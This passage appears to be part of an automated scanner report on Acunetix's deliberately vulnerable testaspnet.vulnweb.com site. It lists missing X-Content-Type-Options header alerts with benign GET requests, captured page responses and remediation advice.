          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        20. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        21. GET http://testaspnet.vulnweb.com/robots.txt
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (222 bytes)
          GET http://testaspnet.vulnweb.com/robots.txt HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (245 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/plain
          Last-Modified: Mon, 06 May 2019 12:46:42 GMT
          Accept-Ranges: bytes
          ETag: "b0b05ac194d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13
          
          
          Response body (13 bytes)
          User-agent: *
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        22. GET http://testaspnet.vulnweb.com/rssFeed.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (220 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/xml; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2118
          
          
          Response body (2118 bytes)
          
          <rss version="2.0">
                <channel>
                  <title>Acunetix testaspnet</title>
                  <link>http://testaspnet.acunetix.com/</link>
                  <description>
                    This is the syndication feed for testaspnet.acunetix.com.
                  </description>
          
                  <item>
                    <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title>
                    <description>
                       Seamless OpenVAS integration now also available on Windows and Linux
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=0
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Thu, 16 May 2019 12:32:30 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Acunetix Web Vulnerability Scanner beta released!</title>
                    <description>
                       26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=3
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:37:35 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Web attacks - can your web applications withstand the force?</title>
                    <description>
                       21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=2
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:35:22 GMT
                     </pubDate>
                  </item>
            
                </channel>
              </rss>  
            
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        23. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
